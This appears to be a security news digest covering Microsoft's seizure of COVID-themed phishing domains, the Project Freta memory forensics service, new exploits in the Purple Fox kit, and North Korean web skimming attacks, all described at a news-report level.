Microsoft seized Covid themed email domains

The technology giant announced the takedown of the business email compromise operation

The attackers tried to gain access to victims’ email inboxes, contacts and other sensitive files in order to send emails to businesses that look like they came from a trusted source. The end goal of the attack is to steal information or redirect wire transfers.

Microsoft said it first detected and scuppered the operation in December, but that the attackers returned, using the COVID-19 pandemic as a fresh lure to open malicious emails. In one week alone, the attackers sent malicious emails to millions of users, Microsoft said.

It shows a growing trend of using the U.S. courts system to shut down cyberattacks when time is of the essence, without having to involve the federal authorities, a process that’s frequently cumbersome, bureaucratic and seldom quick.

“This unique civil case against COVID-19-themed [business email compromise] attacks has allowed us to proactively disable key domains that are part of the criminals’ malicious infrastructure, which is a critical step in protecting our customers,” said Burt.

The attack worked by tricking victims into turning over access to their email accounts. Court filings seen by TechCrunch describe how the attackers used phishing emails “designed to look like they come from an employer or other trusted source.”

The malicious web app that steals victims’ account access tokens. Image Credits: Microsoft

Once clicked, the phishing email opens a legitimate Microsoft login page. But once the victim enters their username and password, they are redirected to a malicious web app that was built and controlled by the attackers. If the user is tricked into approving the web app access to their accounts, the web app siphons off and sends the victim’s account access tokens to the attackers. Account access tokens are designed to keep users logged in without having to reenter their passwords, but if stolen and abused, can grant full access to a victim’s account.

Burt said the malicious operation allowed the attackers to trick victims into giving over access to their accounts “without explicitly” requiring the victim to turn over their username and password, “as they would in a more traditional phishing campaign.”

With access to those accounts, the attackers would have full control of the accounts to send spoofed messages designed to trick companies into turning over sensitive information or carry out fraud, a common tactic for financially driven attackers.

By taking out the attackers’ domains used in the attack, Burt said the civil case against the attackers let the company “proactively disable key domains that are part of the criminals’ malicious infrastructure.”

It’s not the first time Microsoft has asked a court to grant it ownership of malicious domains. In the past two years, Microsoft took control of domains belonging to hackers backed by both Russia and Iran.

Project Freta ! Microsoft new cloud forensic initiative

Microsoft Research yesterday announced Project Freta, a free, cloud-based service for detecting rootkits and advanced malware in memory snapshots of live Linux systems. This service was developed by the NExT Security Ventures (NSV) team at Microsoft Research.

Snapshot-based memory forensics is an old security technique, but it is not available for customers from any major cloud provider. Project Freta will allow customers to perform full memory audits of thousands of virtual machines (VMs) without intrusive capture mechanisms.

Project Freta intends to automate and democratize VM forensics to a point where every user and every enterprise can sweep volatile memory for unknown malware with the push of a button—no setup required.

Microsoft Research’s Project Freta is now available to the public for free with no usage limit. It is capable of automatically fingerprinting and auditing a memory snapshot of most cloud-based Linux VMs. For now, over 4,000 kernel versions are supported automatically.

Key features:

  • Detect novel malicious software, kernel rootkits, process hiding, and other intrusion artifacts via agentless operation by operating directly on captured VM snapshots
  • Very easy to use: submit a captured image to generate a report of its content
  • Memory inspection means no software to install, no notice to malware to evacuate or destroy data
  • Designed for automating IR-like discovery tasks directly into a cloud fabric — though volatile memory snapshots captured from an acquisition tool can also be used for bare iron scenarios where virtualization is not available

PurpleFox Adds Two More Microsoft Vulnerabilities


Security company Proofpoint has identified two new exploits coded into Purple Fox, an exploit kit that has evolved dramatically in the last year. The updates show that cyber-criminals are continuing to invest in infection tools to help get their malware onto victims’ systems even though exploit kits are declining as an attack technique, the company said.

An exploit kit is a tool used to deliver malware onto a victim’s device automatically via a website. It is an automated threat that uses compromised websites to drive up web traffic and scan for vulnerable browsers so that it can deliver its malware-based payload.

Exploit kits are the basis for drive-by downloads that infect a victim as soon as they visit a malicious site. They have often been sold as services to distribute malware, providing cyber-criminals with a conduit to infect victims’ machines, but according to Proofpoint their popularity has declined of late.

“Exploit Kits are not as prevalent as they were a few years ago. However, they are still part of the threat landscape,” explained the company. “One thing that hasn’t changed regarding exploit kits is the way in which exploit kit authors regularly update to include new attacks against newly discovered vulnerabilities.”

Purple Fox started out as a fileless downloader Trojan malware delivered by an exploit kit called Rig. In 2018 it had infected at least 30,000 users at the time. its downloading and executing cryptomining malware onto victims’ devices. Last year, it switched from the Nullsoft Scriptable Install System to Windows PowerShell as a means of retrieving and delivering various kinds of malware.

Now, it has converged as an exploit kit in its own right, built to replace Rig. It has added two new exploits, both patched by Microsoft in the last few months.

The first, CVE-2019-1458, is a local privilege elevation mobility that Microsoft fixed in December last year. The second, CVE-2020-0674, is a bug in Internet Explorer that Microsoft fixed in its February 2020 patch Tuesday update.

“The fact that the authors of the Purple Fox malware have stopped using the RIG EK [exploit kit] and moved to build their own EK to distribute their malware reminds us that malware is a business,” Proofpoint said in its analysis. “In essence, the authors behind the Purple Fox malware decided to bring development ‘in-house’ to reduce costs, just like many legitimate businesses do.”

North Korea under lime light again ! This time with Skimming…

North Korea’s state-sponsored hacking crews are breaking into online stores to insert malicious code that can steal buyers’ payment card details as they visit the checkout page and fill in payment forms.

These types of attacks are named “web skimming,” “e-skimming,” or “Magecart attack,” with the last name coming from the name of the first group who engaged in such tactics.

Web skimming attacks are simple in nature, although they require advanced technical skills from hackers to execute. The goal is for hackers to gain access to a web store’s backend server, associated resources, or third-party widgets, where they can install and run malicious code on the store’s frontend.

The code loads only on the check out page, and silently logs payment card details as they’re entered into checkout forms. This data is then exfiltrated to a remote server, from where hackers collect it and sell it on underground cybercrime markets.

Web skimming attacks usually require hackers to operated a large infrastructure to host the malicious code or run collection points.

The SanSec report links domains and server IP addresses used in recent web skimming attacks to previously-known North Korean state-sponsored hacking infrastructure.

Researchers said evidence points back to Hidden Cobra (or Lazarus Group), the code name given by the US Department of Homeland Security to Pyongyang’s elite state-operated hacking crews.


Green = hacked store
Red = Hidden Cobra controlled exfiltration nodes
Yellow = Unique technique linking the attacks and malicious code


North Korean state-sponsored hacking operations. While many government-backed groups engage in cyber-espionage activities only, North Korea, due to sanctions that are crippling its economy, also uses state hackers to gather funds for its government.

Pyongyang’s hackers have been linked to cyber-heists at banks all over the globe, have been involved in ATM heists and ATM cash-outs, have cryptocurrency scam and have breached cryptocurrency exchanges.

North Korean hackers have also been blamed for infamous Wannacry attack, which brought a large part of the IT world to its knees in May 2017. Authorities and experts said WannaCry was a botched attempt at creating a ransomware strain to use in extorting victims for money to raise funds for the Pyongyang regime.

The fact that North Korean hackers have been involved in web skimming incidents is not a surprise to industry experts, as they’ve historically gravitated towards any type of cybercrime that can generate a profit.